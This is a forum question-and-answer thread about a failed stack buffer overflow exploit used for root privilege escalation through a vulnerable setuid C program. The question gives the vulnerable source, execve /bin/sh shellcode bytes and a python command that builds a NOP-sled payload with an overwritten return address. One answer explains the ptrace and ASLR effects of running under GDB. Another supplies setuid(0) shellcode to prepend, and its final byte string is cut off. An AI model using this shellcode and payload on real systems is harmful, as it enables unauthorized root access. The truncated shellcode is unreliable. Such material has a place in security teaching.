How to get privilege escalation using a vulnerable program with root privilege?

Question

I am trying to exploit privilege escalation for a vulnerable program with root privilege. I tried a shell code for that but I do not know where I am making a mistake.

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
char buf[256];
int len, i;

scanf("%s", buf);
len = strlen(buf);

printf("%s\n", buf);
return 0;
}

The address of buffer starts at "0x7fffffffdfd0". The size of buffer is 272 Bytes. I have used the following shell code which is 29 bytes:

\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05

Additionally, I have used the following input for the attack scenario:

(python -c 'print \x90"*243+"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"+"\xd0\xdf\xff\xff\xff\x7f"') > payload.txt

When I run the program with "run < payload.txt " in GDB, Ido not receive the root access. Any idea or solution would be appreciated.

Answer 1

When I run the program with "run < payload.txt " in GDB, Ido not receive the root access.

That is expected: setuid programs do not get special privileges from the kernel when they are being ptraced (when they run under debugger). Otherwise it would be possible to hijack any setuid program (not just a vulnerable one).

The address of buffer starts at "0x7fffffffdfd0".

How do you know that? Did you find that address with GDB? Have you disabled ASLR?

GDB disables ASLR (in order to make debugging easier -- everything is always at the same address).

If you didn't disable ASLR system-wide, then buffer likely does not start at 0x7fffffffdfd0.

Answer 2

I guess, add your shellcode with setuid(0)

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0)

Modified shellcode :

\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x0